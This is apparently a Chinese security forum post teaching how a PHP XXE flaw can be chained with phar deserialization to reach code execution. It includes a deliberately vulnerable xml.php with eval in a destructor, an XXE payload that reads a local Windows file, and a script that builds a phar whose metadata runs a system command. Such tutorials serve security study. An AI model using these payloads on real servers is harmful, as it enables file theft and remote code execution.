重要:在 PHP 里面解析 xml 用的是 libxml,当 libxml 的版本大于 2.9.0 的时候默认是禁止解析 xml 外部实体内容的。
以下代码存在 xxe 漏洞。
xml.php:
<?php
class Test{
public $cmd;
public function __destruct()
{
eval($this->cmd);
}
}
$xmlfile = @file_get_contents("php://input");
$result = @simplexml_load_string($xmlfile);
echo $result;
// 另一种解析 xml 的方式
// class Test{
// public $cmd;
// public function __destruct()
// {
// eval($this->cmd);
// }
// }
// $file = file_get_contents("php://input");
// $dom = new DOMDocument();
// $dom->loadXML($file);
// $result = simplexml_import_dom($dom);
// echo $result;
触发 xxe 漏洞实现任意文件读取。
<?xml version="1.0"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" >]>
<foo>&xxe;</foo>
在 xml 中有一个 Test 类,如果能反序列化该类的话就可以构造恶意代码执行。
支持解析 xml 外部实体的协议如下,可以看到 PHP 支持 phar 协议。也就是说只要有一个文件上传点,并且文件上传的路径是有回显的,那么就可以配合 xxe 漏洞去触发反序列化漏洞。
通过 xee 触发反序列化漏洞进行任意代码执行。
第一步:先构造 Test 类的 phar 文件,假设生成的 phar 文件已经被上传到 xml.php 的同一个目录。
<?php
class Test{
public function __construct(){
$this->cmd = 'system(whoami);';
}
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new Test();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
第二步:利用 xxe 漏洞使用 phar 协议解析 phar 文件成功执行命令。
点击收藏 | 1
关注 | 1
